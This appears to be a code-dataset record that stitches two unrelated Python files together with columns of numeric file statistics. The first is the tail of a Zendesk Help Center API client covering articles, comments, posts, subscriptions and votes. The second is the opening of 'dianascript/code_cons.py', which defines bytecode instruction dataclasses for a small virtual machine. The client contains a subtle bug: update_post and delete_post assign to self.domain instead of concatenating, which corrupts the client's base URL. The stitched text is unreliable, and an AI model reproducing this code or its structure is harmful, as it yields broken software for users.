return self.put(url, data, self.email, self.password)
def delete_comment(self, article_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}.json".format(
article_id=article_id, id=comment_id
)
)
return self.delete(url, self.email, self.password)
# Labels Functions
def list_all_labels(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/help_center/articles/labels.json" + option_string
return self._page_gets(url, "labels")
def list_labels_by_article(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{id}/labels.json"
+ option_string
)
url = url.format(id=article_id)
return self._page_gets(url, "labels")
def show_label(self, label_id):
url = self.domain + "/api/v2/help_center/articles/labels/{id}.json".format(
id=label_id
)
return self.get(url, self.email, self.password)
def create_label(self, article_id, data):
url = self.domain + "/api/v2/help_center/articles/{id}/labels.json".format(
id=article_id
)
return self.post(url, data, self.email, self.password)
def delete_label(self, article_id, label_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/labels/{id}.json".format(
article_id=article_id, id=label_id
)
)
return self.delete(url, self.email, self.password)
# Article Attachments
def list_article_attachments(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/attachments.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "article_attachments")
def list_article_inline_attachments(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/attachments/inline.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "article_attachments")
def list_article_block_attachments(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/attachments/block.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "article_attachments")
def show_article_attachment(self, attachment_id):
url = self.domain + "/api/v2/help_center/articles/attachments/{id}.json".format(
id=attachment_id
)
return self.get(url, self.email, self.password)
def create_article_attachment(self, article_id, data):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/attachments.json".format(
article_id=article_id
)
)
return self.post(url, data, self.email, self.password)
def create_unassociated_attachment(self, data):
url = self.domain + "/api/v2/help_center/articles/attachments.json"
return self.post(url, data, self.email, self.password)
def delete_article_attachment(self, attachment_id, data):
url = self.domain + "/api/v2/help_center/articles/attachments/{id}.json".format(
id=attachment_id
)
return self.delete(url, self.email, self.password)
# Topic functions
def list_all_topics(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/topics.json" + option_string
return self._page_gets(url, "topics")
def show_topic(self, topic_id):
url = self.domain + "/api/v2/community/topics/{id}.json".format(id=topic_id)
return self.get(url, self.email, self.password)
def create_topic(self, data):
url = self.domain + "/api/v2/community/topics.json"
return self.post(url, data, self.email, self.password)
def update_topic(self, topic_id, data):
url = self.domain + "/api/v2/community/topics/{id}.json".format(id=topic_id)
return self.put(url, data, self.email, self.password)
def delete_topic(self, topic_id):
url = self.domain + "/api/v2/community/topics/{id}.json".format(id=topic_id)
return self.delete(url, self.email, self.password)
# Post functions
def list_all_posts(self, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/posts.json" + option_string
return self._page_gets(url, "posts")
def list_posts_by_topic(self, topic_id, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/topics/{id}/posts.json" + option_string
url = url.format(id=topic_id)
return self._page_gets(url, "posts")
def list_posts_by_user(self, user_id, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/users/{id}/posts.json" + option_string
url = url.format(id=user_id)
return self._page_gets(url, "posts")
def show_post(self, post_id):
url = self.domain + "/api/v2/community/posts/{id}.json".format(id=post_id)
return self.get(url, self.email, self.password)
def create_post(self, data):
url = self.domain + "/api/v2/community/posts.json"
return self.post(url, data, self.email, self.password)
def update_post(self, post_id, data):
url = self.domain = "/api/v2/community/posts/{id}.json".format(id=post_id)
return self.put(url, data, self.email, self.password)
def delete_post(self, post_id):
url = self.domain = "/api/v2/community/posts/{id}.json".format(id=post_id)
return self.delete(url, self.email, self.password)
# Post comment functions
def list_post_comments(self, post_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/community/posts/{post_id}/comments.json"
+ option_string
)
url = url.format(post_id=post_id)
return self._page_gets(url, "comments")
def list_post_comments_by_user(self, user_id, options=None):
option_string = self._generate_options(options)
url = self.domain + "/api/v2/community/users/{id}/comments.json" + option_string
url = url.format(id=user_id)
return self._page_gets(url, "comments")
def show_post_comment(self, post_id, comment_id):
url = (
self.domain
+ "/api/v2/community/posts/{post_id}/comments/{id}.json".format(
post_id=post_id, id=comment_id
)
)
return self.get(url, self.email, self.password)
def create_post_comment(self, post_id, data):
url = self.domain + "/api/v2/community/posts/{post_id}/comments.json".format(
post_id=post_id
)
return self.post(url, data, self.email, self.password)
def update_post_comment(self, post_id, comment_id, data):
url = (
self.domain
+ "/api/v2/community/posts/{post_id}/comments/{id}.json".format(
post_id=post_id, id=comment_id
)
)
return self.put(url, data, self.email, self.password)
def delete_post_comment(self, post_id, comment_id):
url = (
self.domain
+ "/api/v2/community/posts/{post_id}/comments/{id}.json".format(
post_id=post_id, id=comment_id
)
)
return self.delete(url, self.email, self.password)
# Article Subscription functions
def list_article_subscriptions(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/subscriptions.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "subscriptions")
def show_article_subscription(self, article_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/subscriptions/{id}.json".format(
article_id=article_id, id=subscription_id
)
)
return self.get(url, self.email, self.password)
def create_article_subscription(self, article_id, data):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/subscriptions.json".format(
article_id=article_id
)
)
return self.post(url, data, self.email, self.password)
def delete_article_subscription(self, article_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/subscriptions/{id}.json".format(
article_id=article_id, id=subscription_id
)
)
return self.delete(url, self.email, self.password)
# Section Subscription functions
def list_section_subscriptions(self, section_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/subscriptions.json"
+ option_string
)
url = url.format(section_id=section_id)
return self._page_gets(url, "subscriptions")
def show_section_subscription(self, section_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/subscriptions/{id}.json".format(
section_id=section_id, id=subscription_id
)
)
return self.get(url, self.email, self.password)
def create_section_subscription(self, section_id, data):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/subscriptions.json".format(
section_id=section_id
)
)
return self.post(url, data, self.email, self.password)
def delete_section_subscription(self, section_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/subscriptions/{id}.json".format(
section_id=section_id, id=subscription_id
)
)
return self.delete(url, self.email, self.password)
# User Subscription functions
def list_user_subscriptions(self, user_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/users/{user_id}/subscriptions.json"
+ option_string
)
url = url.format(user_id=user_id)
return self._page_gets(url, "subscriptions")
# Post Subscription functions
def list_post_subscriptions(self, post_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/subscriptions.json"
+ option_string
)
url = url.format(post_id=post_id)
return self._page_gets(url, "subscriptions")
def show_post_subscription(self, post_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/subscriptions/{id}.json".format(
post_id=post_id, id=subscription_id
)
)
return self.get(url, self.email, self.password)
def create_post_subscription(self, post_id, data):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/subscriptions.json".format(
post_id=post_id
)
)
return self.post(url, data, self.email, self.password)
def delete_post_subscription(self, post_id, subscription_id):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/subscriptions/{id}.json".format(
post_id=post_id, id=subscription_id
)
)
return self.delete(url, self.email, self.password)
# Topic Subscription functions
def list_topic_subscriptions(self, topic_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/subscriptions.json"
+ option_string
)
url = url.format(topic_id=topic_id)
return self._page_gets(url, "subscriptions")
def show_topic_subscription(self, topic_id, subscription_id):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/subscriptions/{id}.json".format(
topic_id=topic_id, id=subscription_id
)
)
return self.get(url, self.email, self.password)
def create_topic_subscription(self, topic_id, data):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/subscriptions.json".format(
topic_id=topic_id
)
)
return self.post(url, data, self.email, self.password)
def delete_topic_subscription(self, topic_id, subscription_id):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/subscriptions/{id}.json".format(
topic_id=topic_id, id=subscription_id
)
)
return self.delete(url, self.email, self.password)
# Vote functions
def list_user_votes(self, user_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/users/{user_id}/votes.json"
+ option_string
)
url = url.format(user_id=user_id)
return self._page_gets(url, "votes")
def list_article_votes(self, article_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/votes.json"
+ option_string
)
url = url.format(article_id=article_id)
return self._page_gets(url, "votes")
def list_article_comment_votes(self, article_id, comment_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{comment_id}/votes.json"
+ option_string
)
url = url.format(article_id=article_id, comment_id=comment_id)
return self._page_gets(url, "votes")
def list_post_votes(self, post_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/votes.json"
+ option_string
)
url = url.format(post_id=post_id)
return self._page_gets(url, "votes")
def list_post_comment_votes(self, post_id, comment_id, options=None):
option_string = self._generate_options(options)
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/comments/{comment_id}/votes.json"
+ option_string
)
url = url.format(post_id=post_id, comment_id=comment_id)
return self._page_gets(url, "votes")
def show_vote(self, vote_id):
url = self.domain + "/api/v2/help_center/votes/{id}.json".format(id=vote_id)
return self.get(url, self.email, self.password)
def vote_article_up(self, article_id):
url = self.domain + "/api/v2/help_center/articles/{id}/up.json".format(
id=article_id
)
return self.post(url, None, self.email, self.password)
def vote_article_down(self, article_id):
url = self.domain + "/api/v2/help_center/articles/{id}/down.json".format(
id=article_id
)
return self.post(url, None, self.email, self.password)
def vote_article_comment_up(self, article_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}/up.json".format(
article_id=article_id, id=comment_id
)
)
return self.post(url, None, self.email, self.password)
def vote_article_comment_down(self, article_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/articles/{article_id}/comments/{id}/down.json".format(
article_id=article_id, id=comment_id
)
)
return self.post(url, None, self.email, self.password)
def vote_post_up(self, post_id):
url = self.domain + "/api/v2/help_center/posts/{id}/up.json".format(id=post_id)
return self.post(url, None, self.email, self.password)
def vote_post_down(self, post_id):
url = self.domain + "/api/v2/help_center/posts/{id}/down.json".format(
id=post_id
)
return self.post(url, None, self.email, self.password)
def vote_post_comment_up(self, post_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/comments/{id}/up.json".format(
post_id=post_id, id=comment_id
)
)
return self.post(url, None, self.email, self.password)
def vote_post_comment_down(self, post_id, comment_id):
url = (
self.domain
+ "/api/v2/help_center/posts/{post_id}/comments/{id}/down.json".format(
post_id=post_id, id=comment_id
)
)
return self.post(url, None, self.email, self.password)
def delete_vote(self, vote_id):
url = self.domain + "/api/v2/help_center/votes/{id}.json".format(id=vote_id)
return self.delete(url, self.email, self.password)
# Access policy functions
def show_section_access_policy(self, section_id):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/access_policy.json".format(
section_id=section_id
)
)
return self.get(url, self.email, self.password)
def show_topic_access_policy(self, topic_id):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/access_policy.json".format(
topic_id=topic_id
)
)
return self.get(url, self.email, self.password)
def update_section_access_policy(self, section_id, data):
url = (
self.domain
+ "/api/v2/help_center/sections/{section_id}/access_policy.json".format(
section_id=section_id
)
)
return self.put(url, data, self.email, self.password)
def update_topic_access_policy(self, topic_id, data):
url = (
self.domain
+ "/api/v2/community/topics/{topic_id}/access_policy.json".format(
topic_id=topic_id
)
)
return self.put(url, data, self.email, self.password)
# Article Search functions
def search_articles_by_labels(self, labels):
labels_string = ",".join(labels)
url = (
self.domain
+ "/api/v2/help_center/articles.json?label_names="
+ labels_string
)
return self._page_gets(url, "articles")
# User Information
def get_me(self):
url = self.domain + "/api/v2/users/me.json"
return self.get(url, self.email, self.password)
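# Minimal usage sketch (hypothetical: the wrapper's class name and constructor
# are not shown here, but the methods above rely on self.domain, self.email and
# self.password, so an instantiation along these lines is assumed):
#
#   hc = HelpCenterClient("https://example.zendesk.com", "agent@example.com", "api_token")
#   sections = hc.list_all_sections()                    # pages through /sections.json
#   section = hc.show_section(67890, locale="en-us")     # single GET
#   hc.search_articles_by_labels(["photos", "camera"])   # ?label_names=photos,camera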
| 35.803059
| 95
| 0.599439
| 4,468
| 37,450
| 4.801925
| 0.027753
| 0.055791
| 0.075134
| 0.090981
| 0.90282
| 0.887392
| 0.872058
| 0.857889
| 0.833232
| 0.798369
| 0
| 0.004762
| 0.287797
| 37,450
| 1,045
| 96
| 35.837321
| 0.79964
| 0.012069
| 0
| 0.552752
| 0
| 0
| 0.177867
| 0.166969
| 0
| 0
| 0
| 0
| 0
| 1
| 0.134174
| false
| 0.091743
| 0.009174
| 0
| 0.277523
| 0.002294
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
edf0effdc5b15a84ca9b42dea9cee4ec9d0933a4
| 22,925
|
py
|
Python
|
dianascript/code_cons.py
|
thautwarm/DianaVM
|
be13363e4137c919df15601366d91ab69361dd18
|
[
"BSD-3-Clause"
] | 1
|
2021-11-10T12:36:45.000Z
|
2021-11-10T12:36:45.000Z
|
dianascript/code_cons.py
|
thautwarm/DianaVM
|
be13363e4137c919df15601366d91ab69361dd18
|
[
"BSD-3-Clause"
] | null | null | null |
dianascript/code_cons.py
|
thautwarm/DianaVM
|
be13363e4137c919df15601366d91ab69361dd18
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import annotations
from dataclasses import dataclass
from pyrsistent import PVector
from dianascript.serialize import DObj, Builder, InternString, serialize_
from typing import TypeVar, Generic, TYPE_CHECKING
import struct
_T = TypeVar("_T")
if TYPE_CHECKING:
Bytecode = PVector[int | InternString]
BytecodeBuilder = list[int | InternString]
@dataclass(frozen=True)
class Diana_FunctionDef:
metadataInd: int
TAG = 0
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.metadataInd)
@dataclass(frozen=True)
class Diana_LoadGlobalRef:
istr: InternString
TAG = 1
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.istr)
@dataclass(frozen=True)
class Diana_DelVar:
target: int
TAG = 2
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.target)
@dataclass(frozen=True)
class Diana_LoadVar:
i: int
TAG = 3
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.i)
@dataclass(frozen=True)
class Diana_StoreVar:
i: int
TAG = 4
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.i)
@dataclass(frozen=True)
class Diana_Action:
kind: int
TAG = 5
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.kind)
@dataclass(frozen=True)
class Diana_Return:
TAG = 6
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_Break:
TAG = 7
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_Continue:
TAG = 8
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_JumpIfNot:
off: int
TAG = 9
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_JumpIfNot_OrPop:
off: int
TAG = 10
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_JumpIf:
off: int
TAG = 11
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_JumpIf_OrPop:
off: int
TAG = 12
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_Jump:
off: int
TAG = 13
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_GetAttr:
attr: InternString
TAG = 14
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr:
attr: InternString
TAG = 15
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Iadd:
attr: InternString
TAG = 16
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Isub:
attr: InternString
TAG = 17
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Imul:
attr: InternString
TAG = 18
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Itruediv:
attr: InternString
TAG = 19
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ifloordiv:
attr: InternString
TAG = 20
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Imod:
attr: InternString
TAG = 21
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ipow:
attr: InternString
TAG = 22
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ilshift:
attr: InternString
TAG = 23
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Irshift:
attr: InternString
TAG = 24
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ibitor:
attr: InternString
TAG = 25
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ibitand:
attr: InternString
TAG = 26
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ibitxor:
attr: InternString
TAG = 27
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_DelItem:
TAG = 28
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_GetItem:
TAG = 29
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem:
TAG = 30
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Iadd:
TAG = 31
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Isub:
TAG = 32
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Imul:
TAG = 33
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Itruediv:
TAG = 34
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ifloordiv:
TAG = 35
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Imod:
TAG = 36
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ipow:
TAG = 37
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ilshift:
TAG = 38
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Irshift:
TAG = 39
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ibitor:
TAG = 40
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ibitand:
TAG = 41
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ibitxor:
TAG = 42
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_add:
TAG = 43
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_sub:
TAG = 44
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_mul:
TAG = 45
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_truediv:
TAG = 46
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_floordiv:
TAG = 47
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_mod:
TAG = 48
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_pow:
TAG = 49
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_lshift:
TAG = 50
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_rshift:
TAG = 51
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_bitor:
TAG = 52
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_bitand:
TAG = 53
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_bitxor:
TAG = 54
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_gt:
TAG = 55
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_lt:
TAG = 56
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_ge:
TAG = 57
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_le:
TAG = 58
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_eq:
TAG = 59
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_ne:
TAG = 60
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_in:
TAG = 61
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_notin:
TAG = 62
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_UnaryOp_invert:
TAG = 63
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_UnaryOp_not:
TAG = 64
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_UnaryOp_neg:
TAG = 65
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_MKDict:
n: int
TAG = 66
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_MKSet:
n: int
TAG = 67
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_MKList:
n: int
TAG = 68
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Call:
n: int
TAG = 69
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Format:
format: int
argn: int
TAG = 70
OFFSET = 3
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.format)
flat_code.append(self.argn)
@dataclass(frozen=True)
class Diana_Const:
p_const: int
TAG = 71
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.p_const)
@dataclass(frozen=True)
class Diana_MKTuple:
n: int
TAG = 72
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Pack:
n: int
TAG = 73
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Replicate:
n: int
TAG = 74
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Pop:
TAG = 75
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_TryCatch:
unwind_bound: int
catch_start: int
catch_bound: int
TAG = 76
OFFSET = 4
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.unwind_bound)
flat_code.append(self.catch_start)
flat_code.append(self.catch_bound)
@dataclass(frozen=True)
class Diana_TryFinally:
unwind_bound: int
final_start: int
final_bound: int
TAG = 77
OFFSET = 4
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.unwind_bound)
flat_code.append(self.final_start)
flat_code.append(self.final_bound)
@dataclass(frozen=True)
class Diana_TryCatchFinally:
unwind_bound: int
catch_start: int
catch_bound: int
final_start: int
final_bound: int
TAG = 78
OFFSET = 6
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.unwind_bound)
flat_code.append(self.catch_start)
flat_code.append(self.catch_bound)
flat_code.append(self.final_start)
flat_code.append(self.final_bound)
@dataclass(frozen=True)
class Diana_Loop:
loop_bound: int
TAG = 79
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.loop_bound)
@dataclass(frozen=True)
class Diana_For:
loop_bound: int
TAG = 80
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.loop_bound)
@dataclass(frozen=True)
class Diana_With:
with_bound: int
TAG = 81
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.with_bound)
@dataclass(frozen=True)
class FuncMeta:
is_vararg: bool
freeslots: PVector[int]
